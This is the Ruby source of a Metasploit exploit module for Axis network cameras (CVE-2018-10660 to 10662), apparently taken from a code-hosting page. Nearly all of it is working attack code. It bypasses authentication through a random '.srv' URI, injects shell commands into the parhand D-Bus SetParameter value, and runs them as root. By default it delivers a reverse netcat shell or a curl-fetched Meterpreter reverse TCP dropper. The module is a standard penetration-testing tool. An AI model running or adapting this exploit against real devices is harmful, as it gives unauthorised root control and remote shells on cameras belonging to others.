rapid7/metasploit-framework

View on GitHub
modules/exploits/linux/http/axis_srv_parhand_rce.rb

Summary

Maintainability
A
2 hrs
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Axis Network Camera .srv-to-parhand RCE',
      'Description'         => %q{
        This module exploits an auth bypass in .srv functionality and a
        command injection in parhand to execute code as the root user.
      },
      'Author'              => [
        'Or Peles',       # Vulnerability discovery (VDOO)
        'wvu',            # Metasploit module
        'sinn3r',         # Metasploit module
        'Brent Cook',     # Metasploit module
        'Jacob Robles',   # Metasploit module
        'Matthew Kienow', # Metasploit module
        'Shelby Pace',    # Metasploit module
        'Chris Lee',      # Metasploit module
        'Cale Black'      # Metasploit module
      ],
      'References'          => [
        ['CVE', '2018-10660'],
        ['CVE', '2018-10661'],
        ['CVE', '2018-10662'],
        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],
        ['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']
      ],
      'DisclosureDate'      => '2018-06-18',
      'License'             => MSF_LICENSE,
      'Platform'            => ['unix', 'linux'],
      'Arch'                => [ARCH_CMD, ARCH_ARMLE],
      'Privileged'          => true,
      'Targets'             => [
        ['Unix In-Memory',
          'Platform'        => 'unix',
          'Arch'            => ARCH_CMD,
          'Type'            => :unix_memory,
          'Payload'         => {
            'BadChars'      => ' ',
            'Encoder'       => 'cmd/ifs',
            'Compat'        => {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'netcat-e'
            }
          },
          'DefaultOptions'  => {
            'PAYLOAD'       => 'cmd/unix/reverse_netcat_gaping'
          }
        ],
        ['Linux Dropper',
          'Platform'        => 'linux',
          'Arch'            => ARCH_ARMLE,
          'Type'            => :linux_dropper,
          'DefaultOptions'  => {
            'PAYLOAD'       => 'linux/armle/meterpreter_reverse_tcp'
          }
        ]
      ],
      'DefaultTarget'       => 1,
      'DefaultOptions'      => {'WfsDelay' => 10}
    ))
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => "/index.html/#{rand_srv}"
    )

    if res && res.code == 204
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(flavor: :curl, nospace: true)
    end
  end

  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action'  => 'dbus',
        'args'    => dbus_send(
          method: :set_param,
          param:  "string:root.Time.DST.Enabled string:;(#{cmd})&"
        )
      }
    )

    send_request_cgi(
      'method'    => 'POST',
      'uri'       => "/index.html/#{rand_srv}",
      'vars_post' => {
        'action'  => 'dbus',
        'args'    => dbus_send(method: :synch_params)
      }
    )
  end

  def dbus_send(method:, param: nil)
    args = '--system --dest=com.axis.PolicyKitParhand ' \
           '--type=method_call /com/axis/PolicyKitParhand '

    args <<
      case method
      when :set_param
        "com.axis.PolicyKitParhand.SetParameter #{param}"
      when :synch_params
        'com.axis.PolicyKitParhand.SynchParameters'
      end

    args
  end

  def rand_srv
    "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
  end

end